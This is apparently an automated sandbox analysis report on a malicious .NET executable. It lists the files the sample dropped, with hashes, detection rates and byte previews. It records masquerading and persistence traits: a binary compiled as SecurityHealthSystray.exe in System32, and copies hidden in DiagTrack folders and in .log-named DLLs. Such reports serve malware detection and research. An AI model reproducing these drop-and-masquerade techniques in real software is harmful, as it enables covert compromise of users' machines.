                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                          C:\Users\user\Desktop\ZBNMMRPs.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):32256
                                                                          Entropy (8bit):5.631194486392901
                                                                          Encrypted:false
                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                          C:\Users\user\Desktop\ZwLVNbth.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23552
                                                                          Entropy (8bit):5.519109060441589
                                                                          Encrypted:false
                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                          C:\Users\user\Desktop\bTenUpua.log

                                                                          Download File
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):85504
                                                                          Entropy (8bit):5.8769270258874755
                                                                          Encrypted:false
                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                          C:\Users\user\Desktop\bddb3c02ebef1e

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with very long lines (432), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):432
                                                                          Entropy (8bit):5.838829911265421
                                                                          Encrypted:false
                                                                          SSDEEP:12:8sQwarITUp4B+64lEOKVSTf5ZEqnjgpK6hUzctuj:9QwarITUG+iORfFjH6hUIK
                                                                          MD5:FB146BAA725A66AF14DD04C59ECE83E1
                                                                          SHA1:2E158D7DA392F637E285AD2DA3E3C046B05506DF
                                                                          SHA-256:DDCDF6FBEC6970C2994FE71249A284C94750401DB61D60201CE91A6432944B19
                                                                          SHA-512:934B01DEBE667DADA68D898F623245BE79919B6EE139D0D0254993ACD1202FD7C0037487B16A0AFE1CFD17BCBB5DAC38FE7AEAC870523BCBA6AB4C3362D68736
                                                                          Malicious:false
                                                                          Preview:p8XXnuF8VIXWUjV7iLiWCjjtFgFsiaoTsHjaxwQXfGLddVhDfeklh2YGYoSGoXZ5eDoM94Jv4L15XGPt9CNEzDwztdCJeJsIqQ9arUDkUzqWBcsSZiHmKVFaRydf2ARvcsOHHzCo9muAWayQvtu5CG8VKiI21hrUh53SOkKkgcmhlEE0AMuIPVsWu26jqKxb4acbhfCLjKZjdauGeS1pxjELMghVnl3WpLmLlmSfJjjF6J3UI0FXSHnVVROA7rh7QC3Ryif19WgO98PDnNMxggDhiQzUYRhbBmy3PlfjUOX5lZWWCLXuftau9WthtKcrzEMXKVxCrmcSII5J4cSM4x6RLE43270KvpFhM8MqXVC2RIl0aknQ2PxCI4LFa3JtwShcDY65QlzjuDADdEdRUjRf2CZRwHQdLSG8kIxCnrARaNSF

                                                                          C:\Users\user\Desktop\dZJDzodr.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):69632
                                                                          Entropy (8bit):5.932541123129161
                                                                          Encrypted:false
                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                          C:\Users\user\Desktop\euKdPjTG.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):85504
                                                                          Entropy (8bit):5.8769270258874755
                                                                          Encrypted:false
                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                          C:\Users\user\Desktop\kAfKNzod.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):32256
                                                                          Entropy (8bit):5.631194486392901
                                                                          Encrypted:false
                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                          C:\Users\user\Desktop\kkpLxnoP.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):69632
                                                                          Entropy (8bit):5.932541123129161
                                                                          Encrypted:false
                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                          C:\Users\user\Desktop\mSTLtqAw.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):32256
                                                                          Entropy (8bit):5.631194486392901
                                                                          Encrypted:false
                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                          C:\Users\user\Desktop\nIcTiRiZ.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):85504
                                                                          Entropy (8bit):5.8769270258874755
                                                                          Encrypted:false
                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                          C:\Users\user\Desktop\uWGScrdc.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23552
                                                                          Entropy (8bit):5.519109060441589
                                                                          Encrypted:false
                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                          C:\Windows\DiagTrack\Scenarios\5915f7c410c8eb

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):40
                                                                          Entropy (8bit):4.784183719779189
                                                                          Encrypted:false
                                                                          SSDEEP:3:XNrIMkgKKzQu:XpxpKKD
                                                                          MD5:EF0EDA97D12D6902297C2FC4AA1DC19E
                                                                          SHA1:16009B70B7AEFD29389DE4BD354C3F60E19A7E83
                                                                          SHA-256:2E416E0F1068E1E7B5106A80EA9E5491FEEDB09A6ADB8A1762C8EF44BD93D399
                                                                          SHA-512:FF8C3A9E0AE97AB33A4791CDB9BA463B47FEE319B50FAA6B86800B83E560439BD3DA4C63786300E273A7045184DBC5908A6EB50141459D749463E60C96CC15E4
                                                                          Malicious:false
                                                                          Preview:kA9oIIUVYb6BcURbnmiAEouUXof4DT347ihxC9j1

                                                                          C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1917440
                                                                          Entropy (8bit):7.539358678373951
                                                                          Encrypted:false
                                                                          SSDEEP:24576:PYWx+zBv7JhqvqIsCHeX2RYk1ORuQfAb3ev4XwpgcYZSqu/lYXeHB80K:PAz2H5RYj4QyQZviTu/Ouh
                                                                          MD5:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          SHA1:616A5C549F6C1C191F82D8CEA82C65E25869241E
                                                                          SHA-256:2FB0B933C97AA9B37E31F7ADF38695E8185B61C7D312C183F05FD4256EF38497
                                                                          SHA-512:577146B764A00BCD3FF34A4EC278C49DB91E7A5EB3647F561455499A7C01C52C513A5283041A378FFB57747E0AD0C93795D7287B5814A01F94612AC81F1828C2
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.Ig.................:..........^X... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...d8... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................@X......H.......8...............@....|...W.......................................0..........(.... ........8........E....<...........=...87...(.... ........8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........b...=...........8....r...ps....z*....~....(d...~....(h... ....?.... ....8.......... ....~....{....:....& ....8....~....(\... .... .... ....s....~....(`....... ....~....{....:E...& ....8:...~....:Y... ....8&.....(.

                                                                          C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe:Zone.Identifier

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:false
                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                          C:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMP

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                          File Type:MSVC .res
                                                                          Category:dropped
                                                                          Size (bytes):1224
                                                                          Entropy (8bit):4.435108676655666
                                                                          Encrypted:false
                                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                          Malicious:false
                                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                          C:\Windows\System32\SecurityHealthSystray.exe

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):4608
                                                                          Entropy (8bit):3.9963249113310817
                                                                          Encrypted:false
                                                                          SSDEEP:48:6gJzPt5M7Jt8Bs3FJsdcV4MKe27BdRajvqBHWOulajfqXSfbNtm:LPgPc+Vx9MsvkwcjRzNt
                                                                          MD5:71A4F77B0DE2AF3836AB43851FC6AAA3
                                                                          SHA1:0DCE4B2D8A9BC16077F05251BA977AE91CC284D2
                                                                          SHA-256:FAC0A7B8CA9B417B185809D593FEB029DD270C417DE49391E4296049970BF1CD
                                                                          SHA-512:C164F4634934064E4848E0B387A11E758E5F6D780034661AA9AAECC37D45CCF460A4EDA5464F434660C0B71969B60824336EC746D0D3759B1A7AEF48710E5791
                                                                          Malicious:true
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....~g.............................'... ...@....@.. ....................................@..................................'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..l.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.<.......#GUID...L... ...#Blob...........WU........%3................................................................

                                                                          \Device\Null

                                                                          Download File
                                                                          Process:C:\Windows\System32\w32tm.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):151
                                                                          Entropy (8bit):4.8487941168639646
                                                                          Encrypted:false
                                                                          SSDEEP:3:VLV993J+miJWEoJ8FXwVTtQuJbsS8qXKNvo5XYUJFyXKvj:Vx993DEUftB1sS8+JXFyXs
                                                                          MD5:C27235F1960C1D4AAFDFCB9929C712B9
                                                                          SHA1:B4962CC540729EB2B47285B575AF377AA57D3FF1
                                                                          SHA-256:82746B79A990FAFF2124EAC2BAD5043B08C8E3A388FC862FFFEA74DCEFE1A845
                                                                          SHA-512:6239615B9B74E19AAB3C3AB83DB2A0D1FCE6402A75C02121CB0F2C83F7749A7F5083E1A7715A09A8906B8A524651A57544158DCF643BF071F44A96204FCB5409
                                                                          Malicious:false
                                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 08/01/2025 14:29:16..14:29:16, error: 0x80072746.14:29:21, error: 0x80072746.

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.539358678373951
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          File name:PlZA6b48MW.exe
                                                                          File size:1'917'440 bytes
                                                                          MD5:32db4bf35b9c2efc730718e2f8cd4fbc
                                                                          SHA1:616a5c549f6c1c191f82d8cea82c65e25869241e
                                                                          SHA256:2fb0b933c97aa9b37e31f7adf38695e8185b61c7d312c183f05fd4256ef38497
                                                                          SHA512:577146b764a00bcd3ff34a4ec278c49db91e7a5eb3647f561455499a7c01c52c513a5283041a378ffb57747e0ad0c93795d7287b5814a01f94612ac81f1828c2
                                                                          SSDEEP:24576:PYWx+zBv7JhqvqIsCHeX2RYk1ORuQfAb3ev4XwpgcYZSqu/lYXeHB80K:PAz2H5RYj4QyQZviTu/Ouh
                                                                          TLSH:2695AE1A65E34E32C2A1173165A7113DC291D7623552FF0B361F2492A84BBF1AEB36F3
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.Ig.................:..........^X... ...`....@.. ....................................@................................

                                                                          File Icon

                                                                          Icon Hash:90cececece8e8eb0

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x5d585e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
